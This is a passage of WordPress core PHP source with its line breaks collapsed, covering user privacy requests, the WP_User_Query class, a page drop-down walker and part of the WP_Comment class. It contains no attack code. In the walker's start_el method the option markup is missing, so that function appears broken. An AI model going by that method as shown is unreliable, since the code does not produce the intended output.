WP_Error( 'invalid_key', __( 'Invalid key.' ) ); } if ( ! $expiration_time || time() > $expiration_time ) { return new WP_Error( 'expired_key', __( 'The confirmation email has expired.' ) ); } return true; } /** * Return data about a user request. * * @since 4.9.6 * * @param int $request_id Request ID to get data about. * @return WP_User_Request|false */ function wp_get_user_request_data( $request_id ) { $request_id = absint( $request_id ); $post = get_post( $request_id ); if ( ! $post || 'user_request' !== $post->post_type ) { return false; } return new WP_User_Request( $post ); } /** * WP_User_Request class. * * Represents user request data loaded from a WP_Post object. * * @since 4.9.6 */ final class WP_User_Request { /** * Request ID. * * @var int */ public $ID = 0; /** * User ID. * * @var int */ public $user_id = 0; /** * User email. * * @var int */ public $email = ''; /** * Action name. * * @var string */ public $action_name = ''; /** * Current status. * * @var string */ public $status = ''; /** * Timestamp this request was created. * * @var int|null */ public $created_timestamp = null; /** * Timestamp this request was last modified. * * @var int|null */ public $modified_timestamp = null; /** * Timestamp this request was confirmed. * * @var int */ public $confirmed_timestamp = null; /** * Timestamp this request was completed. * * @var int */ public $completed_timestamp = null; /** * Misc data assigned to this request. * * @var array */ public $request_data = array(); /** * Key used to confirm this request. * * @var string */ public $confirm_key = ''; /** * Constructor. * * @since 4.9.6 * * @param WP_Post|object $post Post object. */ public function __construct( $post ) { $this->ID = $post->ID; $this->user_id = $post->post_author; $this->email = $post->post_title; $this->action_name = $post->post_name; $this->status = $post->post_status; $this->created_timestamp = strtotime( $post->post_date_gmt ); $this->modified_timestamp = strtotime( $post->post_modified_gmt ); $this->confirmed_timestamp = (int) get_post_meta( $post->ID, '_wp_user_request_confirmed_timestamp', true ); $this->completed_timestamp = (int) get_post_meta( $post->ID, '_wp_user_request_completed_timestamp', true ); $this->request_data = json_decode( $post->post_content, true ); $this->confirm_key = $post->post_password; } } /** * User API: WP_User_Query class * * @package WordPress * @subpackage Users * @since 4.4.0 */ /** * Core class used for querying users. * * @since 3.1.0 * * @see WP_User_Query::prepare_query() for information on accepted arguments. */ class WP_User_Query { /** * Query vars, after parsing * * @since 3.5.0 * @var array */ public $query_vars = array(); /** * List of found user ids * * @since 3.1.0 * @var array */ private $results; /** * Total number of found users for the current query * * @since 3.1.0 * @var int */ private $total_users = 0; /** * Metadata query container. * * @since 4.2.0 * @var WP_Meta_Query */ public $meta_query = false; /** * The SQL query used to fetch matching users. * * @since 4.4.0 * @var string */ public $request; private $compat_fields = array( 'results', 'total_users' ); // SQL clauses public $query_fields; public $query_from; public $query_where; public $query_orderby; public $query_limit; /** * PHP5 constructor. * * @since 3.1.0 * * @param null|string|array $query Optional. The query variables. */ public function __construct( $query = null ) { if ( ! empty( $query ) ) { $this->prepare_query( $query ); $this->query(); } } /** * Fills in missing query variables with default values. * * @since 4.4.0 * * @param array $args Query vars, as passed to `WP_User_Query`. * @return array Complete query variables with undefined ones filled in with defaults. */ public static function fill_query_vars( $args ) { $defaults = array( 'blog_id' => get_current_blog_id(), 'role' => '', 'role__in' => array(), 'role__not_in' => array(), 'meta_key' => '', 'meta_value' => '', 'meta_compare' => '', 'include' => array(), 'exclude' => array(), 'search' => '', 'search_columns' => array(), 'orderby' => 'login', 'order' => 'ASC', 'offset' => '', 'number' => '', 'paged' => 1, 'count_total' => true, 'fields' => 'all', 'who' => '', 'has_published_posts' => null, 'nicename' => '', 'nicename__in' => array(), 'nicename__not_in' => array(), 'login' => '', 'login__in' => array(), 'login__not_in' => array(), ); return wp_parse_args( $args, $defaults ); } /** * Prepare the query variables. * * @since 3.1.0 * @since 4.1.0 Added the ability to order by the `include` value. * @since 4.2.0 Added 'meta_value_num' support for `$orderby` parameter. Added multi-dimensional array syntax * for `$orderby` parameter. * @since 4.3.0 Added 'has_published_posts' parameter. * @since 4.4.0 Added 'paged', 'role__in', and 'role__not_in' parameters. The 'role' parameter was updated to * permit an array or comma-separated list of values. The 'number' parameter was updated to support * querying for all users with using -1. * @since 4.7.0 Added 'nicename', 'nicename__in', 'nicename__not_in', 'login', 'login__in', * and 'login__not_in' parameters. * * @global wpdb $wpdb WordPress database abstraction object. * @global int $blog_id * * @param string|array $query { * Optional. Array or string of Query parameters. * * @type int $blog_id The site ID. Default is the current site. * @type string|array $role An array or a comma-separated list of role names that users must match * to be included in results. Note that this is an inclusive list: users * must match *each* role. Default empty. * @type array $role__in An array of role names. Matched users must have at least one of these * roles. Default empty array. * @type array $role__not_in An array of role names to exclude. Users matching one or more of these * roles will not be included in results. Default empty array. * @type string $meta_key User meta key. Default empty. * @type string $meta_value User meta value. Default empty. * @type string $meta_compare Comparison operator to test the `$meta_value`. Accepts '=', '!=', * '>', '>=', '<', '<=', 'LIKE', 'NOT LIKE', 'IN', 'NOT IN', * 'BETWEEN', 'NOT BETWEEN', 'EXISTS', 'NOT EXISTS', 'REGEXP', * 'NOT REGEXP', or 'RLIKE'. Default '='. * @type array $include An array of user IDs to include. Default empty array. * @type array $exclude An array of user IDs to exclude. Default empty array. * @type string $search Search keyword. Searches for possible string matches on columns. * When `$search_columns` is left empty, it tries to determine which * column to search in based on search string. Default empty. * @type array $search_columns Array of column names to be searched. Accepts 'ID', 'login', * 'nicename', 'email', 'url'. Default empty array. * @type string|array $orderby Field(s) to sort the retrieved users by. May be a single value, * an array of values, or a multi-dimensional array with fields as * keys and orders ('ASC' or 'DESC') as values. Accepted values are * 'ID', 'display_name' (or 'name'), 'include', 'user_login' * (or 'login'), 'login__in', 'user_nicename' (or 'nicename'), * 'nicename__in', 'user_email (or 'email'), 'user_url' (or 'url'), * 'user_registered' (or 'registered'), 'post_count', 'meta_value', * 'meta_value_num', the value of `$meta_key`, or an array key of * `$meta_query`. To use 'meta_value' or 'meta_value_num', `$meta_key` * must be also be defined. Default 'user_login'. * @type string $order Designates ascending or descending order of users. Order values * passed as part of an `$orderby` array take precedence over this * parameter. Accepts 'ASC', 'DESC'. Default 'ASC'. * @type int $offset Number of users to offset in retrieved results. Can be used in * conjunction with pagination. Default 0. * @type int $number Number of users to limit the query for. Can be used in * conjunction with pagination. Value -1 (all) is supported, but * should be used with caution on larger sites. * Default empty (all users). * @type int $paged When used with number, defines the page of results to return. * Default 1. * @type bool $count_total Whether to count the total number of users found. If pagination * is not needed, setting this to false can improve performance. * Default true. * @type string|array $fields Which fields to return. Single or all fields (string), or array * of fields. Accepts 'ID', 'display_name', 'user_login', * 'user_nicename', 'user_email', 'user_url', 'user_registered'. * Use 'all' for all fields and 'all_with_meta' to include * meta fields. Default 'all'. * @type string $who Type of users to query. Accepts 'authors'. * Default empty (all users). * @type bool|array $has_published_posts Pass an array of post types to filter results to users who have * published posts in those post types. `true` is an alias for all * public post types. * @type string $nicename The user nicename. Default empty. * @type array $nicename__in An array of nicenames to include. Users matching one of these * nicenames will be included in results. Default empty array. * @type array $nicename__not_in An array of nicenames to exclude. Users matching one of these * nicenames will not be included in results. Default empty array. * @type string $login The user login. Default empty. * @type array $login__in An array of logins to include. Users matching one of these * logins will be included in results. Default empty array. * @type array $login__not_in An array of logins to exclude. Users matching one of these * logins will not be included in results. Default empty array. * } */ public function prepare_query( $query = array() ) { global $wpdb; if ( empty( $this->query_vars ) || ! empty( $query ) ) { $this->query_limit = null; $this->query_vars = $this->fill_query_vars( $query ); } /** * Fires before the WP_User_Query has been parsed. * * The passed WP_User_Query object contains the query variables, not * yet passed into SQL. * * @since 4.0.0 * * @param WP_User_Query $this The current WP_User_Query instance, * passed by reference. */ do_action( 'pre_get_users', $this ); // Ensure that query vars are filled after 'pre_get_users'. $qv =& $this->query_vars; $qv = $this->fill_query_vars( $qv ); if ( is_array( $qv['fields'] ) ) { $qv['fields'] = array_unique( $qv['fields'] ); $this->query_fields = array(); foreach ( $qv['fields'] as $field ) { $field = 'ID' === $field ? 'ID' : sanitize_key( $field ); $this->query_fields[] = "$wpdb->users.$field"; } $this->query_fields = implode( ',', $this->query_fields ); } elseif ( 'all' == $qv['fields'] ) { $this->query_fields = "$wpdb->users.*"; } else { $this->query_fields = "$wpdb->users.ID"; } if ( isset( $qv['count_total'] ) && $qv['count_total'] ) { $this->query_fields = 'SQL_CALC_FOUND_ROWS ' . $this->query_fields; } $this->query_from = "FROM $wpdb->users"; $this->query_where = 'WHERE 1=1'; // Parse and sanitize 'include', for use by 'orderby' as well as 'include' below. if ( ! empty( $qv['include'] ) ) { $include = wp_parse_id_list( $qv['include'] ); } else { $include = false; } $blog_id = 0; if ( isset( $qv['blog_id'] ) ) { $blog_id = absint( $qv['blog_id'] ); } if ( $qv['has_published_posts'] && $blog_id ) { if ( true === $qv['has_published_posts'] ) { $post_types = get_post_types( array( 'public' => true ) ); } else { $post_types = (array) $qv['has_published_posts']; } foreach ( $post_types as &$post_type ) { $post_type = $wpdb->prepare( '%s', $post_type ); } $posts_table = $wpdb->get_blog_prefix( $blog_id ) . 'posts'; $this->query_where .= " AND $wpdb->users.ID IN ( SELECT DISTINCT $posts_table.post_author FROM $posts_table WHERE $posts_table.post_status = 'publish' AND $posts_table.post_type IN ( " . join( ', ', $post_types ) . ' ) )'; } // nicename if ( '' !== $qv['nicename'] ) { $this->query_where .= $wpdb->prepare( ' AND user_nicename = %s', $qv['nicename'] ); } if ( ! empty( $qv['nicename__in'] ) ) { $sanitized_nicename__in = array_map( 'esc_sql', $qv['nicename__in'] ); $nicename__in = implode( "','", $sanitized_nicename__in ); $this->query_where .= " AND user_nicename IN ( '$nicename__in' )"; } if ( ! empty( $qv['nicename__not_in'] ) ) { $sanitized_nicename__not_in = array_map( 'esc_sql', $qv['nicename__not_in'] ); $nicename__not_in = implode( "','", $sanitized_nicename__not_in ); $this->query_where .= " AND user_nicename NOT IN ( '$nicename__not_in' )"; } // login if ( '' !== $qv['login'] ) { $this->query_where .= $wpdb->prepare( ' AND user_login = %s', $qv['login'] ); } if ( ! empty( $qv['login__in'] ) ) { $sanitized_login__in = array_map( 'esc_sql', $qv['login__in'] ); $login__in = implode( "','", $sanitized_login__in ); $this->query_where .= " AND user_login IN ( '$login__in' )"; } if ( ! empty( $qv['login__not_in'] ) ) { $sanitized_login__not_in = array_map( 'esc_sql', $qv['login__not_in'] ); $login__not_in = implode( "','", $sanitized_login__not_in ); $this->query_where .= " AND user_login NOT IN ( '$login__not_in' )"; } // Meta query. $this->meta_query = new WP_Meta_Query(); $this->meta_query->parse_query_vars( $qv ); if ( isset( $qv['who'] ) && 'authors' == $qv['who'] && $blog_id ) { $who_query = array( 'key' => $wpdb->get_blog_prefix( $blog_id ) . 'user_level', 'value' => 0, 'compare' => '!=', ); // Prevent extra meta query. $qv['blog_id'] = $blog_id = 0; if ( empty( $this->meta_query->queries ) ) { $this->meta_query->queries = array( $who_query ); } else { // Append the cap query to the original queries and reparse the query. $this->meta_query->queries = array( 'relation' => 'AND', array( $this->meta_query->queries, $who_query ), ); } $this->meta_query->parse_query_vars( $this->meta_query->queries ); } $roles = array(); if ( isset( $qv['role'] ) ) { if ( is_array( $qv['role'] ) ) { $roles = $qv['role']; } elseif ( is_string( $qv['role'] ) && ! empty( $qv['role'] ) ) { $roles = array_map( 'trim', explode( ',', $qv['role'] ) ); } } $role__in = array(); if ( isset( $qv['role__in'] ) ) { $role__in = (array) $qv['role__in']; } $role__not_in = array(); if ( isset( $qv['role__not_in'] ) ) { $role__not_in = (array) $qv['role__not_in']; } if ( $blog_id && ( ! empty( $roles ) || ! empty( $role__in ) || ! empty( $role__not_in ) || is_multisite() ) ) { $role_queries = array(); $roles_clauses = array( 'relation' => 'AND' ); if ( ! empty( $roles ) ) { foreach ( $roles as $role ) { $roles_clauses[] = array( 'key' => $wpdb->get_blog_prefix( $blog_id ) . 'capabilities', 'value' => '"' . $role . '"', 'compare' => 'LIKE', ); } $role_queries[] = $roles_clauses; } $role__in_clauses = array( 'relation' => 'OR' ); if ( ! empty( $role__in ) ) { foreach ( $role__in as $role ) { $role__in_clauses[] = array( 'key' => $wpdb->get_blog_prefix( $blog_id ) . 'capabilities', 'value' => '"' . $role . '"', 'compare' => 'LIKE', ); } $role_queries[] = $role__in_clauses; } $role__not_in_clauses = array( 'relation' => 'AND' ); if ( ! empty( $role__not_in ) ) { foreach ( $role__not_in as $role ) { $role__not_in_clauses[] = array( 'key' => $wpdb->get_blog_prefix( $blog_id ) . 'capabilities', 'value' => '"' . $role . '"', 'compare' => 'NOT LIKE', ); } $role_queries[] = $role__not_in_clauses; } // If there are no specific roles named, make sure the user is a member of the site. if ( empty( $role_queries ) ) { $role_queries[] = array( 'key' => $wpdb->get_blog_prefix( $blog_id ) . 'capabilities', 'compare' => 'EXISTS', ); } // Specify that role queries should be joined with AND. $role_queries['relation'] = 'AND'; if ( empty( $this->meta_query->queries ) ) { $this->meta_query->queries = $role_queries; } else { // Append the cap query to the original queries and reparse the query. $this->meta_query->queries = array( 'relation' => 'AND', array( $this->meta_query->queries, $role_queries ), ); } $this->meta_query->parse_query_vars( $this->meta_query->queries ); } if ( ! empty( $this->meta_query->queries ) ) { $clauses = $this->meta_query->get_sql( 'user', $wpdb->users, 'ID', $this ); $this->query_from .= $clauses['join']; $this->query_where .= $clauses['where']; if ( $this->meta_query->has_or_relation() ) { $this->query_fields = 'DISTINCT ' . $this->query_fields; } } // sorting $qv['order'] = isset( $qv['order'] ) ? strtoupper( $qv['order'] ) : ''; $order = $this->parse_order( $qv['order'] ); if ( empty( $qv['orderby'] ) ) { // Default order is by 'user_login'. $ordersby = array( 'user_login' => $order ); } elseif ( is_array( $qv['orderby'] ) ) { $ordersby = $qv['orderby']; } else { // 'orderby' values may be a comma- or space-separated list. $ordersby = preg_split( '/[,\s]+/', $qv['orderby'] ); } $orderby_array = array(); foreach ( $ordersby as $_key => $_value ) { if ( ! $_value ) { continue; } if ( is_int( $_key ) ) { // Integer key means this is a flat array of 'orderby' fields. $_orderby = $_value; $_order = $order; } else { // Non-integer key means this the key is the field and the value is ASC/DESC. $_orderby = $_key; $_order = $_value; } $parsed = $this->parse_orderby( $_orderby ); if ( ! $parsed ) { continue; } if ( 'nicename__in' === $_orderby || 'login__in' === $_orderby ) { $orderby_array[] = $parsed; } else { $orderby_array[] = $parsed . ' ' . $this->parse_order( $_order ); } } // If no valid clauses were found, order by user_login. if ( empty( $orderby_array ) ) { $orderby_array[] = "user_login $order"; } $this->query_orderby = 'ORDER BY ' . implode( ', ', $orderby_array ); // limit if ( isset( $qv['number'] ) && $qv['number'] > 0 ) { if ( $qv['offset'] ) { $this->query_limit = $wpdb->prepare( 'LIMIT %d, %d', $qv['offset'], $qv['number'] ); } else { $this->query_limit = $wpdb->prepare( 'LIMIT %d, %d', $qv['number'] * ( $qv['paged'] - 1 ), $qv['number'] ); } } $search = ''; if ( isset( $qv['search'] ) ) { $search = trim( $qv['search'] ); } if ( $search ) { $leading_wild = ( ltrim( $search, '*' ) != $search ); $trailing_wild = ( rtrim( $search, '*' ) != $search ); if ( $leading_wild && $trailing_wild ) { $wild = 'both'; } elseif ( $leading_wild ) { $wild = 'leading'; } elseif ( $trailing_wild ) { $wild = 'trailing'; } else { $wild = false; } if ( $wild ) { $search = trim( $search, '*' ); } $search_columns = array(); if ( $qv['search_columns'] ) { $search_columns = array_intersect( $qv['search_columns'], array( 'ID', 'user_login', 'user_email', 'user_url', 'user_nicename', 'display_name' ) ); } if ( ! $search_columns ) { if ( false !== strpos( $search, '@' ) ) { $search_columns = array( 'user_email' ); } elseif ( is_numeric( $search ) ) { $search_columns = array( 'user_login', 'ID' ); } elseif ( preg_match( '|^https?://|', $search ) && ! ( is_multisite() && wp_is_large_network( 'users' ) ) ) { $search_columns = array( 'user_url' ); } else { $search_columns = array( 'user_login', 'user_url', 'user_email', 'user_nicename', 'display_name' ); } } /** * Filters the columns to search in a WP_User_Query search. * * The default columns depend on the search term, and include 'user_email', * 'user_login', 'ID', 'user_url', 'display_name', and 'user_nicename'. * * @since 3.6.0 * * @param string[] $search_columns Array of column names to be searched. * @param string $search Text being searched. * @param WP_User_Query $this The current WP_User_Query instance. */ $search_columns = apply_filters( 'user_search_columns', $search_columns, $search, $this ); $this->query_where .= $this->get_search_sql( $search, $search_columns, $wild ); } if ( ! empty( $include ) ) { // Sanitized earlier. $ids = implode( ',', $include ); $this->query_where .= " AND $wpdb->users.ID IN ($ids)"; } elseif ( ! empty( $qv['exclude'] ) ) { $ids = implode( ',', wp_parse_id_list( $qv['exclude'] ) ); $this->query_where .= " AND $wpdb->users.ID NOT IN ($ids)"; } // Date queries are allowed for the user_registered field. if ( ! empty( $qv['date_query'] ) && is_array( $qv['date_query'] ) ) { $date_query = new WP_Date_Query( $qv['date_query'], 'user_registered' ); $this->query_where .= $date_query->get_sql(); } /** * Fires after the WP_User_Query has been parsed, and before * the query is executed. * * The passed WP_User_Query object contains SQL parts formed * from parsing the given query. * * @since 3.1.0 * * @param WP_User_Query $this The current WP_User_Query instance, * passed by reference. */ do_action_ref_array( 'pre_user_query', array( &$this ) ); } /** * Execute the query, with the current variables. * * @since 3.1.0 * * @global wpdb $wpdb WordPress database abstraction object. */ public function query() { global $wpdb; $qv =& $this->query_vars; /** * Filters the users array before the query takes place. * * Return a non-null value to bypass WordPress's default user queries. * Filtering functions that require pagination information are encouraged to set * the `total_users` property of the WP_User_Query object, passed to the filter * by reference. If WP_User_Query does not perform a database query, it will not * have enough information to generate these values itself. * * @since 5.1.0 * * @param array|null $results Return an array of user data to short-circuit WP's user query * or null to allow WP to run its normal queries. * @param WP_User_Query $this The WP_User_Query instance (passed by reference). */ $this->results = apply_filters_ref_array( 'users_pre_query', array( null, &$this ) ); if ( null === $this->results ) { $this->request = "SELECT $this->query_fields $this->query_from $this->query_where $this->query_orderby $this->query_limit"; if ( is_array( $qv['fields'] ) || 'all' == $qv['fields'] ) { $this->results = $wpdb->get_results( $this->request ); } else { $this->results = $wpdb->get_col( $this->request ); } if ( isset( $qv['count_total'] ) && $qv['count_total'] ) { /** * Filters SELECT FOUND_ROWS() query for the current WP_User_Query instance. * * @since 3.2.0 * @since 5.1.0 Added the `$this` parameter. * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $sql The SELECT FOUND_ROWS() query for the current WP_User_Query. * @param WP_User_Query $this The current WP_User_Query instance. */ $found_users_query = apply_filters( 'found_users_query', 'SELECT FOUND_ROWS()', $this ); $this->total_users = (int) $wpdb->get_var( $found_users_query ); } } if ( ! $this->results ) { return; } if ( 'all_with_meta' == $qv['fields'] ) { cache_users( $this->results ); $r = array(); foreach ( $this->results as $userid ) { $r[ $userid ] = new WP_User( $userid, '', $qv['blog_id'] ); } $this->results = $r; } elseif ( 'all' == $qv['fields'] ) { foreach ( $this->results as $key => $user ) { $this->results[ $key ] = new WP_User( $user, '', $qv['blog_id'] ); } } } /** * Retrieve query variable. * * @since 3.5.0 * * @param string $query_var Query variable key. * @return mixed */ public function get( $query_var ) { if ( isset( $this->query_vars[ $query_var ] ) ) { return $this->query_vars[ $query_var ]; } return null; } /** * Set query variable. * * @since 3.5.0 * * @param string $query_var Query variable key. * @param mixed $value Query variable value. */ public function set( $query_var, $value ) { $this->query_vars[ $query_var ] = $value; } /** * Used internally to generate an SQL string for searching across multiple columns * * @since 3.1.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $string * @param array $cols * @param bool $wild Whether to allow wildcard searches. Default is false for Network Admin, true for single site. * Single site allows leading and trailing wildcards, Network Admin only trailing. * @return string */ protected function get_search_sql( $string, $cols, $wild = false ) { global $wpdb; $searches = array(); $leading_wild = ( 'leading' == $wild || 'both' == $wild ) ? '%' : ''; $trailing_wild = ( 'trailing' == $wild || 'both' == $wild ) ? '%' : ''; $like = $leading_wild . $wpdb->esc_like( $string ) . $trailing_wild; foreach ( $cols as $col ) { if ( 'ID' == $col ) { $searches[] = $wpdb->prepare( "$col = %s", $string ); } else { $searches[] = $wpdb->prepare( "$col LIKE %s", $like ); } } return ' AND (' . implode( ' OR ', $searches ) . ')'; } /** * Return the list of users. * * @since 3.1.0 * * @return array Array of results. */ public function get_results() { return $this->results; } /** * Return the total number of users for the current query. * * @since 3.1.0 * * @return int Number of total users. */ public function get_total() { return $this->total_users; } /** * Parse and sanitize 'orderby' keys passed to the user query. * * @since 4.2.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $orderby Alias for the field to order by. * @return string Value to used in the ORDER clause, if `$orderby` is valid. */ protected function parse_orderby( $orderby ) { global $wpdb; $meta_query_clauses = $this->meta_query->get_clauses(); $_orderby = ''; if ( in_array( $orderby, array( 'login', 'nicename', 'email', 'url', 'registered' ) ) ) { $_orderby = 'user_' . $orderby; } elseif ( in_array( $orderby, array( 'user_login', 'user_nicename', 'user_email', 'user_url', 'user_registered' ) ) ) { $_orderby = $orderby; } elseif ( 'name' == $orderby || 'display_name' == $orderby ) { $_orderby = 'display_name'; } elseif ( 'post_count' == $orderby ) { // todo: avoid the JOIN $where = get_posts_by_author_sql( 'post' ); $this->query_from .= " LEFT OUTER JOIN ( SELECT post_author, COUNT(*) as post_count FROM $wpdb->posts $where GROUP BY post_author ) p ON ({$wpdb->users}.ID = p.post_author) "; $_orderby = 'post_count'; } elseif ( 'ID' == $orderby || 'id' == $orderby ) { $_orderby = 'ID'; } elseif ( 'meta_value' == $orderby || $this->get( 'meta_key' ) == $orderby ) { $_orderby = "$wpdb->usermeta.meta_value"; } elseif ( 'meta_value_num' == $orderby ) { $_orderby = "$wpdb->usermeta.meta_value+0"; } elseif ( 'include' === $orderby && ! empty( $this->query_vars['include'] ) ) { $include = wp_parse_id_list( $this->query_vars['include'] ); $include_sql = implode( ',', $include ); $_orderby = "FIELD( $wpdb->users.ID, $include_sql )"; } elseif ( 'nicename__in' === $orderby ) { $sanitized_nicename__in = array_map( 'esc_sql', $this->query_vars['nicename__in'] ); $nicename__in = implode( "','", $sanitized_nicename__in ); $_orderby = "FIELD( user_nicename, '$nicename__in' )"; } elseif ( 'login__in' === $orderby ) { $sanitized_login__in = array_map( 'esc_sql', $this->query_vars['login__in'] ); $login__in = implode( "','", $sanitized_login__in ); $_orderby = "FIELD( user_login, '$login__in' )"; } elseif ( isset( $meta_query_clauses[ $orderby ] ) ) { $meta_clause = $meta_query_clauses[ $orderby ]; $_orderby = sprintf( 'CAST(%s.meta_value AS %s)', esc_sql( $meta_clause['alias'] ), esc_sql( $meta_clause['cast'] ) ); } return $_orderby; } /** * Parse an 'order' query variable and cast it to ASC or DESC as necessary. * * @since 4.2.0 * * @param string $order The 'order' query variable. * @return string The sanitized 'order' query variable. */ protected function parse_order( $order ) { if ( ! is_string( $order ) || empty( $order ) ) { return 'DESC'; } if ( 'ASC' === strtoupper( $order ) ) { return 'ASC'; } else { return 'DESC'; } } /** * Make private properties readable for backward compatibility. * * @since 4.0.0 * * @param string $name Property to get. * @return mixed Property. */ public function __get( $name ) { if ( in_array( $name, $this->compat_fields ) ) { return $this->$name; } } /** * Make private properties settable for backward compatibility. * * @since 4.0.0 * * @param string $name Property to check if set. * @param mixed $value Property value. * @return mixed Newly-set property. */ public function __set( $name, $value ) { if ( in_array( $name, $this->compat_fields ) ) { return $this->$name = $value; } } /** * Make private properties checkable for backward compatibility. * * @since 4.0.0 * * @param string $name Property to check if set. * @return bool Whether the property is set. */ public function __isset( $name ) { if ( in_array( $name, $this->compat_fields ) ) { return isset( $this->$name ); } } /** * Make private properties un-settable for backward compatibility. * * @since 4.0.0 * * @param string $name Property to unset. */ public function __unset( $name ) { if ( in_array( $name, $this->compat_fields ) ) { unset( $this->$name ); } } /** * Make private/protected methods readable for backward compatibility. * * @since 4.0.0 * * @param string $name Method to call. * @param array $arguments Arguments to pass when calling. * @return mixed Return value of the callback, false otherwise. */ public function __call( $name, $arguments ) { if ( 'get_search_sql' === $name ) { return call_user_func_array( array( $this, $name ), $arguments ); } return false; } } /** * Post API: Walker_PageDropdown class * * @package WordPress * @subpackage Post * @since 4.4.0 */ /** * Core class used to create an HTML drop-down list of pages. * * @since 2.1.0 * * @see Walker */ class Walker_PageDropdown extends Walker { /** * What the class handles. * * @since 2.1.0 * @var string * * @see Walker::$tree_type */ public $tree_type = 'page'; /** * Database fields to use. * * @since 2.1.0 * @var array * * @see Walker::$db_fields * @todo Decouple this */ public $db_fields = array( 'parent' => 'post_parent', 'id' => 'ID', ); /** * Starts the element output. * * @since 2.1.0 * * @see Walker::start_el() * * @param string $output Used to append additional content. Passed by reference. * @param WP_Post $page Page data object. * @param int $depth Optional. Depth of page in reference to parent pages. Used for padding. * Default 0. * @param array $args Optional. Uses 'selected' argument for selected page to set selected HTML * attribute for option element. Uses 'value_field' argument to fill "value" * attribute. See wp_dropdown_pages(). Default empty array. * @param int $id Optional. ID of the current page. Default 0 (unused). */ public function start_el( &$output, $page, $depth = 0, $args = array(), $id = 0 ) { $pad = str_repeat( ' ', $depth * 3 ); if ( ! isset( $args['value_field'] ) || ! isset( $page->{$args['value_field']} ) ) { $args['value_field'] = 'ID'; } $output .= "\t\n"; } } /** * Comment API: WP_Comment class * * @package WordPress * @subpackage Comments * @since 4.4.0 */ /** * Core class used to organize comments as instantiated objects with defined members. * * @since 4.4.0 */ final class WP_Comment { /** * Comment ID. * * @since 4.4.0 * @var int */ public $comment_ID; /** * ID of the post the comment is associated with. * * @since 4.4.0 * @var int */ public $comment_post_ID = 0; /** * Comment author name. * * @since 4.4.0 * @var string */ public $comment_author = ''; /** * Comment author email address. * * @since 4.4.0 * @var string */ public $comment_author_email = ''; /** * Comment author URL. * * @since 4.4.0 * @var string */ public $comment_author_url = ''; /** * Comment author IP address (IPv4 format). * * @since 4.4.0 * @var string */ public $comment_author_IP = ''; /** * Comment date in YYYY-MM-DD HH:MM:SS format. * * @since 4.4.0 * @var string */ public $comment_date = '0000-00-00 00:00:00'; /** * Comment GMT date in YYYY-MM-DD HH::MM:SS format. * * @since 4.4.0 * @var string */ public $comment_date_gmt = '0000-00-00 00:00:00'; /** * Comment content. * * @since 4.4.0 * @var string */ public $comment_content; /** * Comment karma count. * * @since 4.4.0 * @var int */ public $comment_karma = 0; /** * Comment approval status. * * @since 4.4.0 * @var string */ public $comment_approved = '1'; /** * Comment author HTTP user agent. * * @since 4.4.0 * @var string */ public $comment_agent = ''; /** * Comment type. * * @since 4.4.0 * @var string */ public $comment_type = ''; /** * Parent comment ID. * * @since 4.4.0 * @var int */ public $comment_parent = 0; /** * Comment author ID. * * @since 4.4.0 * @var int */ public $user_id = 0; /** * Comment children. * * @since 4.4.0 * @var array */ protected $children; /** * Whether children have been populated for this comment object. * * @since 4.4.0 * @var bool */ protected $populated_children = false; /** * Post fields. * * @since 4.4.0 * @var array */ protected $post_fields = array( 'post_author', 'post_date', 'post_date_gmt', 'post_content', 'post_title', 'post_excerpt', 'post_status', 'comment_status', 'ping_status', 'post_name', 'to_ping', 'pinged', 'post_modified', 'post_modified_gmt', 'post_content_filtered', 'post_parent', 'guid', 'menu_order', 'post_type', 'post_mime_type', 'comment_count' ); /** * Retrieves a WP_Comment instance. * * @since 4.4.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param int $id Comment ID. * @return WP_Comment|false Comment object, otherwise false. */ public static function get_instance( $id ) { global $wpdb; $comment_id = (int) $id; if ( ! $comment_id ) { return false; } $_comment = wp_cache_get( $comment_id, 'comment' ); if ( ! $_comment ) { $_comment = $wpdb->get_row( $wpdb->prepare( "SELECT * FROM $wpdb->comments WHERE comment_ID = %d LIMIT 1", $comment_id ) ); if ( ! $_comment ) { return false; } wp_cache_add( $_comment->comment_ID, $_comment, 'comment' ); } return new WP_Comment( $_comment ); } /** * Constructor. * * Populates properties with object vars. * * @since 4.4.0 * * @param WP_Comment $comment Comment object. */ public function __construct( $comment ) { foreach ( get_object_vars( $comment ) as $key => $value ) { $this->$key = $value; } } /** * Convert object to array. * * @since 4.4.0 * * @return array Object as array. */ public function to_array() { return get_object_vars( $this ); } /** * Get the children of a comment. * * @since 4.4.0 * * @param array $args { * Array of arguments used to pass to get_comments() and determine format. * * @type string $format Return value format. 'tree' for a hierarchical tree, 'flat' for a flattened array. * Default 'tree'. * @type string $status Comment status to limit results by. Accepts 'hold' (`comment_status=0`), * 'approve' (`comment_status=1`), 'all', or a custom comment status. * Default 'all'. * @type string $hierarchical Whether to include comment descendants in the results. * 'threaded' returns a tree, with each comment's children * stored in a `children` property on the `WP_Comment` object. * 'flat' returns a flat array of found comments plus their children. * Pass `false` to leave out descendants. * The parameter is ignored (forced to `false`) when `$fields` is 'ids' or 'counts'. * Accepts 'threaded', 'flat', or false. Default: 'threaded'. * @type string|array $orderby Comment status or array of statuses. To use 'meta_value' * or 'meta_value_num', `$meta_key` must also be defined. * To sort by a specific `$meta_query` clause, use that * clause's array key. Accepts 'comment_agent', * 'comment_approved', 'comment_author', * 'comment_author_email', 'comment_author_IP', * 'comment_author_url', 'comment_content', 'comment_date', * 'comment_date_gmt', 'comment_ID', 'comment_karma', * 'comment_parent', 'comment_post_ID', 'comment_type', * 'user_id', 'comment__in', 'meta_value', 'meta_value_num', * the value of $meta_key, and the array keys of * `$meta_query`. Also accepts false, an empty array, or * 'none' to disable `ORDER BY` clause. * } * @return array Array of `WP_Comment` objects. */ public function get_children( $args = array() ) { $defaults = array( 'format' => 'tree', 'status' => 'all', 'hierarchical' => 'threaded', 'orderby' => '', ); $_args = wp_parse_args( $args, $defaults ); $_args['parent'] = $this->comment_ID; if ( is_null( $this->children ) ) { if ( $this->populated_children ) { $this->children = array(); } else { $this->children = get_comments( $_args ); } } if ( 'flat' === $_args['format'] ) { $children = array(); foreach ( $this->children as $child ) { $child_args = $_args; $child_args['format'] = 'flat'; // get_children() resets this value automatically. unset( $child_args['parent'] ); $children = array_merge( $children, array( $child ), $child->get_children( $child_args ) ); } } else { $children = $this->children; } return $children; } /** * Add a child to the comment. * * Used by `WP_Comment_Query` when bulk-filling descendants. * * 